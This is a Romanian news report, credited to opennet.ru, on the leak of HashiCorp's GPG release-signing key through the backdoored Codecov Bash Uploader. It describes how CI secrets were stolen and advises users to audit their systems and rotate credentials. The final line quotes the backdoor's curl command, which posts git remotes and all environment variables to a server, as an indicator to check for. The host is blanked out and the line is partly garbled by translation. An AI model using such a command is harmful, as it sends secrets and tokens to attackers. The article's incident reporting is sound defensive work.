HashiCorp, cunoscut pentru dezvoltarea instrumentelor open source Vagrant, Packer, Nomad și Terraform, a anunțat scurgerea cheii private GPG folosite pentru a crea semnături digitale care verifică lansările. Atacatorii care au obținut acces la cheia GPG ar putea face modificări ascunse produselor HashiCorp verificându-le cu o semnătură digitală corectă. Totodată, compania a precizat că în timpul auditului nu au fost identificate urme de încercări de a efectua astfel de modificări.
În prezent, cheia GPG compromisă a fost revocată și o nouă cheie a fost introdusă în locul ei. Problema a afectat doar verificarea folosind fișierele SHA256SUM și SHA256SUM.sig și nu a afectat generarea de semnături digitale pentru pachetele Linux DEB și RPM furnizate prin releases.hashicorp.com, precum și mecanismele de verificare a lansării pentru macOS și Windows (AuthentiCode) .
Scurgerea s-a produs din cauza utilizării scriptului Codecov Bash Uploader (codecov-bash) în infrastructură, conceput pentru a descărca rapoarte de acoperire din sistemele de integrare continuă. În timpul atacului asupra companiei Codecov, în scriptul specificat a fost ascunsă o ușă din spate, prin care parolele și cheile de criptare erau trimise către serverul atacatorilor.
Pentru a pirata, atacatorii au profitat de o eroare în procesul de creare a imaginii Codecov Docker, care le-a permis să extragă date de acces la GCS (Google Cloud Storage), necesare pentru a face modificări la scriptul Bash Uploader distribuit de pe codecov.io site-ul web. Modificările au fost făcute pe 31 ianuarie, au rămas nedetectate timp de două luni și au permis atacatorilor să extragă informațiile stocate în mediile de sistem de integrare continuă a clienților. Folosind codul rău intenționat adăugat, atacatorii ar putea obține informații despre depozitul Git testat și despre toate variabilele de mediu, inclusiv jetoane, chei de criptare și parole transmise sistemelor de integrare continuă pentru a organiza accesul la codul aplicației, depozitele și serviciile precum Amazon Web Services și GitHub.
Pe lângă apelul direct, scriptul Codecov Bash Uploader a fost folosit ca parte a altor încărcătoare, cum ar fi Codecov-action (Github), Codecov-circleci-orb și Codecov-bitrise-step, ai căror utilizatori sunt, de asemenea, afectați de problemă. Tuturor utilizatorilor codecov-bash și a produselor aferente li se recomandă să-și auditeze infrastructurile, precum și să schimbe parolele și cheile de criptare. Puteți verifica prezența unei uși din spate într-un script prin prezența liniei curl -sm 0.5 -d „$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || Adevărat
Sursa: opennet.ru